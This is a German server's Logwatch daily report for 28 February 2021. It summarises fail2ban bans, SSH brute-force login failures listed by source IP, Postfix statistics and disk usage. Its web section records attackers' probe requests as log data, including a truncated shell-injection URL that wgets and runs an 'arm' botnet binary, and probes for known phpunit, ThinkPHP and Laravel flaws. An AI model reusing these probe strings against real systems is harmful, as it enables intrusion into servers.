Logwatch for h2361197.stratoserver.net (Linux)

Montag, 1 März 2021


 
 ################### Logwatch 7.4.0 (03/01/11) #################### 
        Processing Initiated: Mon Mar  1 04:42:13 2021
        Date Range Processed: yesterday
                              ( 2021-Feb-28 )
                              Period is day.
        Detail Level of Output: 0
        Type of Output/Format: mail / text
        Logfiles for Host: h2361197.stratoserver.net
 ################################################################## 
 
 --------------------- fail2ban-messages Begin ------------------------ 

 Banned services with Fail2Ban:				 Bans:Unbans
    ssh:                                                    [155:156]
 
 ---------------------- fail2ban-messages End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 
 A total of 4 sites probed the server 
    161.35.230.3
    167.71.102.181
    42.229.215.178
    61.219.11.153
 
 Requests with error response codes
    400 Bad Request
       null: 5 Time(s)
       /config/getuser?index=0: 2 Time(s)
       /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C ... +arm;./arm+jaws: 2 Time(s)
       mstshash=Administr: 2 Time(s)
       ../../proc/: 1 Time(s)
       /: 1 Time(s)
       /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
    404 Not Found
       /robots.txt: 36 Time(s)
       /wp-login.php: 3 Time(s)
       /protokolle/Protokoll_MV_2020_11_12_Muenchen.pdf: 2 Time(s)
       /sites/default/files/Empfehlungen_der_ZaPF ... 7CStellungnahme: 2 Time(s)
       /reader/1994-wi-reader_hb94.pdf: 1 Time(s)
       /sites/all/libraries/elfinder/connectors/php/connector.php: 1 Time(s)
       /sites/all/libraries/elfinder/src/connecto ... p/connector.php: 1 Time(s)
       /sites/default/files/1982_WiSe_Stuttgart.pdf: 1 Time(s)
       /sites/default/files/2006_SoSe_Dresden.pdf: 1 Time(s)
       /stapf: 1 Time(s)
       /wp-content/plugins/secure-file-manager/ve ... tor.minimal.php: 1 Time(s)
       /xmlrpc.php: 1 Time(s)
       /zapf/reader/%7CTagungsreader: 1 Time(s)
    500 Internal Server Error
       /: 39 Time(s)
       /sitemap.txt: 5 Time(s)
       /.env: 2 Time(s)
       /atom.xml: 2 Time(s)
       /robots.txt: 2 Time(s)
       /sitemap_index.xml: 2 Time(s)
       /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
       /?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
       /Autodiscover/Autodiscover.xml: 1 Time(s)
       /_ignition/execute-solution: 1 Time(s)
       /actuator/health: 1 Time(s)
       /admin//config.php: 1 Time(s)
       /api/jsonws/invoke: 1 Time(s)
       /applications/updater/ver.json: 1 Time(s)
       /console/: 1 Time(s)
       /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
       /mifs/.;/services/LogService: 1 Time(s)
       /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
       /se4Q: 1 Time(s)
       /version.json: 1 Time(s)
       /wp-content/plugins/wp-file-manager/readme.txt: 1 Time(s)
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 sshd:
    Authentication Failures:
       root (49.232.83.75): 150 Time(s)
       root (118.25.2.60): 140 Time(s)
       root (81.70.203.235): 101 Time(s)
       root (106.55.49.141): 99 Time(s)
       root (220-128-159-121.hinet-ip.hinet.net): 95 Time(s)
       root (121.5.140.152): 86 Time(s)
       root (206.189.121.234): 85 Time(s)
       root (49.87.29.114): 84 Time(s)
       root (210.14.73.172): 79 Time(s)
       root (65.49.132.179.16clouds.com): 79 Time(s)
       root (119.45.143.113): 71 Time(s)
       root (ns388732.ip-176-31-255.eu): 69 Time(s)
       root (106.53.238.97): 68 Time(s)
       root (1.227.57.126): 66 Time(s)
       root (119.29.155.249): 62 Time(s)
       root (119.45.130.76): 62 Time(s)
       root (061093240018.static.ctinets.com): 61 Time(s)
       root (87.251.122.178): 61 Time(s)
       root (152.32.128.40): 60 Time(s)
       root (218.92.0.185): 60 Time(s)
       root (47.23.90.114): 58 Time(s)
       root (121.4.84.141): 57 Time(s)
       root (222.232.29.235): 56 Time(s)
       unknown (152.32.128.40): 55 Time(s)
       root (218.92.0.145): 54 Time(s)
       root (219.154.81.151): 54 Time(s)
       root (81.70.230.199): 53 Time(s)
       root (14.18.144.234): 51 Time(s)
       root (81.70.168.69): 51 Time(s)
       root (106.12.51.80): 49 Time(s)
       root (219.148.31.135): 48 Time(s)
       root (221.213.63.210): 48 Time(s)
       root (49.235.175.12): 48 Time(s)
       root (119.45.43.86): 47 Time(s)
       root (vps-bd5167ba.vps.ovh.net): 47 Time(s)
       root (113.31.144.153): 46 Time(s)
       root (218.92.0.138): 44 Time(s)
       root (218.92.0.184): 42 Time(s)
       root (147.139.31.22): 41 Time(s)
       unknown (104.248.158.100): 41 Time(s)
       root (192.154.218.65): 40 Time(s)
       root (66.49.84.65.nw.nuvox.net): 39 Time(s)
       root (134.209.109.149): 38 Time(s)
       root (218.92.0.247): 36 Time(s)
       root (61.177.172.104): 30 Time(s)
       root (122.224.240.106): 29 Time(s)
       root (159.89.106.247): 26 Time(s)
       root (124.95.143.135): 25 Time(s)
       unknown (163.172.187.114): 25 Time(s)
       root (218.92.0.171): 24 Time(s)
       root (104.131.249.57): 23 Time(s)
       root (211.108.69.103): 21 Time(s)
       root (104.248.158.100): 20 Time(s)
       root (111.93.214.67): 20 Time(s)
       root (117.95.6.114): 20 Time(s)
       root (49.234.178.175): 19 Time(s)
       root (152.136.101.65): 18 Time(s)
       root (158.101.2.14): 18 Time(s)
       root (221.181.185.237): 18 Time(s)
       root (222.187.238.87): 18 Time(s)
       root (190.128.64.133): 16 Time(s)
       root (106.51.80.198): 14 Time(s)
       root (218.92.0.165): 13 Time(s)
       root (49.232.103.197): 13 Time(s)
       unknown (115.75.195.208): 12 Time(s)
       unknown (125.160.224.220): 12 Time(s)
       unknown (125.163.247.222): 12 Time(s)
       unknown (14.161.254.66): 12 Time(s)
       root (163.172.165.127): 11 Time(s)
       root (103.113.104.43): 10 Time(s)
       root (103.249.83.66): 9 Time(s)
       root (115.99.14.202): 9 Time(s)
       root (163.172.187.114): 9 Time(s)
       root (1.22.228.122): 7 Time(s)
       root (173.242.123.229.16clouds.com): 6 Time(s)
       root (218.92.0.133): 6 Time(s)
       root (221.181.185.143): 6 Time(s)
       root (222.187.239.31): 6 Time(s)
       root (218.92.0.157): 5 Time(s)
       mysql (152.32.128.40): 4 Time(s)
       postgres (152.32.128.40): 4 Time(s)
       root (193.169.255.236): 4 Time(s)
       mysql (163.172.187.114): 3 Time(s)
       root (106.12.107.61): 3 Time(s)
       root (111.231.103.64): 3 Time(s)
       root (165.232.153.192): 3 Time(s)
       root (212.126.127.50): 3 Time(s)
       root (45.93.201.193): 3 Time(s)
       root (61.76.169.138): 3 Time(s)
       unknown (116.110.0.54): 3 Time(s)
       unknown (171.240.207.24): 3 Time(s)
       unknown (195.54.160.250): 3 Time(s)
       mysql (104.248.158.100): 2 Time(s)
       root (106.51.72.221): 2 Time(s)
       unknown (141.98.80.69): 2 Time(s)
       unknown (141.98.80.71): 2 Time(s)
       unknown (141.98.80.82): 2 Time(s)
       unknown (141.98.80.85): 2 Time(s)
       unknown (165.232.153.192): 2 Time(s)
       unknown (bcs182.neoplus.adsl.tpnet.pl): 2 Time(s)
       unknown (host-79-56-245-120.retail.telecomitalia.it): 2 Time(s)
       unknown (sd233156.ching-abc.ab.nthu.edu.tw): 2 Time(s)
       unknown (tor-exit4-readme.dfri.se): 2 Time(s)
       nobody (152.32.128.40): 1 Time(s)
       postgres (104.248.158.100): 1 Time(s)
       root (1.186.248.30): 1 Time(s)
       root (1.234.58.227): 1 Time(s)
       root (106.13.168.180): 1 Time(s)
       root (106.2.207.106): 1 Time(s)
       root (106.52.209.98): 1 Time(s)
       root (111.48.132.225): 1 Time(s)
       root (116.110.0.54): 1 Time(s)
       root (116.62.201.175): 1 Time(s)
       root (119.29.180.74): 1 Time(s)
       root (124.115.205.246): 1 Time(s)
       root (134.175.206.145): 1 Time(s)
       root (141.98.80.70): 1 Time(s)
       root (141.98.80.83): 1 Time(s)
       root (145.14.157.63): 1 Time(s)
       root (154.8.195.36): 1 Time(s)
       root (180.125.121.78): 1 Time(s)
       root (202.47.116.107): 1 Time(s)
       root (206.189.173.15): 1 Time(s)
       root (221.228.109.146): 1 Time(s)
       root (31.220.61.149): 1 Time(s)
       root (42.192.152.72): 1 Time(s)
       root (fat85.internetdsl.tpnet.pl): 1 Time(s)
       unknown (193.169.255.236): 1 Time(s)
       unknown (221.2.140.174): 1 Time(s)
    Invalid Users:
       Unknown Account: 198 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Postfix Begin ------------------------ 

        9   Miscellaneous warnings  
 
   17.810K  Bytes accepted                              18,237
   17.810K  Bytes sent via SMTP                         18,237
 ========   ==================================================
 
        1   Accepted                                   100.00%
 --------   --------------------------------------------------
        1   Total                                      100.00%
 ========   ==================================================
 
        1   4xx Reject relay denied                    100.00%
 --------   --------------------------------------------------
        1   Total 4xx Rejects                          100.00%
 ========   ==================================================
 
       76   Connections             
        8   Connections lost (inbound) 
       76   Disconnections          
        1   Removed from queue      
        1   Sent via SMTP           
 
        3   Hostname verification errors (FCRDNS) 
 
 
 ---------------------- Postfix End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: mailman.gz (1747199807)
  Warning: Large mailbox: mailman (235703599967)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End
------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 Network Read Write Errors: 1
 
 Disconnecting after too many authentication failures for user:
    root : 52 Time(s)
 
 Failed logins from:
    1.22.228.122: 7 times
    1.186.248.30 (1.186.248.30.dvois.com): 1 time
    1.227.57.126: 66 times
    1.234.58.227: 1 time
    14.18.144.234: 51 times
    31.220.61.149: 1 time
    42.192.152.72: 1 time
    45.93.201.193: 3 times
    47.23.90.114 (ool-2f175a72.static.optonline.net): 58 times
    49.87.29.114: 84 times
    49.232.83.75: 150 times
    49.232.103.197: 13 times
    49.234.178.175: 19 times
    49.235.175.12: 48 times
    51.77.231.236 (vps-bd5167ba.vps.ovh.net): 47 times
    61.76.169.138: 3 times
    61.93.240.18 (061093240018.static.ctinets.com): 61 times
    61.177.172.104: 30 times
    65.49.132.179 (65.49.132.179.16clouds.com): 79 times
    66.49.84.65 (66.49.84.65.nw.nuvox.net): 39 times
    81.70.168.69: 51 times
    81.70.203.235: 101 times
    81.70.230.199: 53 times
    83.13.19.85 (fat85.internetdsl.tpnet.pl): 1 time
    87.251.122.178 (h087251122178.mkr.dsl.sakhalin.ru): 61 times
    103.113.104.43 (axntech-dynamic-43.104.113.103.axntechnologies.in): 10 times
    103.249.83.66 (PTPL-AS56272-REV-66.83.249.103-CHN.PULSE.IN): 9 times
    104.131.249.57: 23 times
    104.248.158.100: 23 times
    106.2.207.106: 1 time
    106.12.51.80: 49 times
    106.12.107.61: 3 times
    106.13.168.180: 1 time
    106.51.72.221 (broadband.actcorp.in): 2 times
    106.51.80.198 (broadband.actcorp.in): 14 times
    106.52.209.98: 1 time
    106.53.238.97: 68 times
    106.55.49.141: 99 times
    111.48.132.225: 1 time
    111.93.214.67 (static-67.214.93.111-tataidc.co.in): 20 times
    111.231.103.64: 3 times
    113.31.144.153: 46 times
    115.99.14.202: 9 times
    116.62.201.175: 1 time
    116.110.0.54: 1 time
    117.95.6.114: 20 times
    118.25.2.60: 140 times
    119.29.155.249: 62 times
    119.29.180.74: 1 time
    119.45.43.86: 47 times
    119.45.130.76: 62 times
    119.45.143.113: 71 times
    121.4.84.141: 57 times
    121.5.140.152: 86 times
    122.224.240.106: 29 times
    124.95.143.135: 25 times
    124.115.205.246: 1 time
    134.175.206.145: 1 time
    134.209.109.149 (devtest.samtradefx.com): 38 times
    141.98.80.70: 1 time
    141.98.80.83: 1 time
    145.14.157.63: 1 time
    147.139.31.22: 41 times
    152.32.128.40: 69 times
    152.136.101.65: 18 times
    154.8.195.36: 1 time
    158.101.2.14: 18 times
    159.89.106.247: 26 times
    163.172.165.127 (127-165-172-163.instances.scw.cloud): 11 times
    163.172.187.114 (114-187-172-163.instances.scw.cloud): 12 times
    165.232.153.192: 3 times
    173.242.123.229 (173.242.123.229.16clouds.com): 6 times
    176.31.255.63 (ns388732.ip-176-31-255.eu): 69 times
    180.125.121.78: 1 time
    190.128.64.133 (pei-190-128-lxiv-cxxxiii.une.net.co): 16 times
    192.154.218.65 (v192-154-218.us-west.sugarhosts.net): 40 times
    193.169.255.236: 4 times
    202.47.116.107 (static-202.47.116.107.RK-Infratel.com): 1 time
    206.189.121.234: 85 times
    206.189.173.15: 1 time
    210.14.73.172: 79 times
    211.108.69.103: 21 times
    212.126.127.50: 3 times
    218.92.0.133: 6 times
    218.92.0.138: 44 times
    218.92.0.145: 54 times
    218.92.0.157: 5 times
    218.92.0.165: 16 times
    218.92.0.171: 24 times
    218.92.0.184: 42 times
    218.92.0.185: 60 times
    218.92.0.247: 36 times
    219.148.31.135: 48 times
    219.154.81.151 (hn.kd.jz.adsl): 54 times
    220.128.159.121 (220-128-159-121.HINET-IP.hinet.net): 95 times
    221.181.185.143: 6 times
    221.181.185.237: 18 times
    221.213.63.210: 48 times
    221.228.109.146: 1 time
    222.187.238.87: 18 times
    222.187.239.31: 6 times
    222.232.29.235: 56 times
 
 Illegal users from:
    undef: 78 times
    14.161.254.66: 15 times
    65.49.20.68 (scan-19.shadowserver.org): 1 time
    79.56.245.120 (host-79-56-245-120.retail.telecomitalia.it): 2 times
    83.27.234.182 (bcs182.neoplus.adsl.tpnet.pl): 2 times
    104.248.158.100: 41 times
    115.75.195.208 (mail.bvndtp.org.vn): 15 times
    116.110.0.54: 3 times
    125.160.224.220 (220.subnet125-160-224.speedy.telkom.net.id): 15 times
    125.163.247.222 (222.subnet125-163-247.speedy.telkom.net.id): 15 times
    139.162.122.110 (scan-8.security.ipip.net): 1 time
    140.114.233.156 (sd233156.ching-abc.ab.nthu.edu.tw): 2 times
    141.98.80.69: 2 times
    141.98.80.70: 1 time
    141.98.80.71: 2 times
    141.98.80.82: 2 times
    141.98.80.83: 1 time
    141.98.80.85: 2 times
    152.32.128.40: 55 times
    163.172.187.114 (114-187-172-163.instances.scw.cloud): 25 times
    165.232.153.192: 2 times
    171.25.193.78 (tor-exit4-readme.dfri.se): 2 times
    171.240.207.24 (dynamic-ip-adsl.viettel.vn): 3 times
    193.169.255.236: 1 time
    195.54.160.250: 3 times
    205.185.125.54: 7 times
    221.2.140.174: 1 time
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem         Size  Used Avail Use% Mounted on
 /dev/ploop47755p1  394G  242G  132G  65% /
 none               4.0G     0  4.0G   0% /dev
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016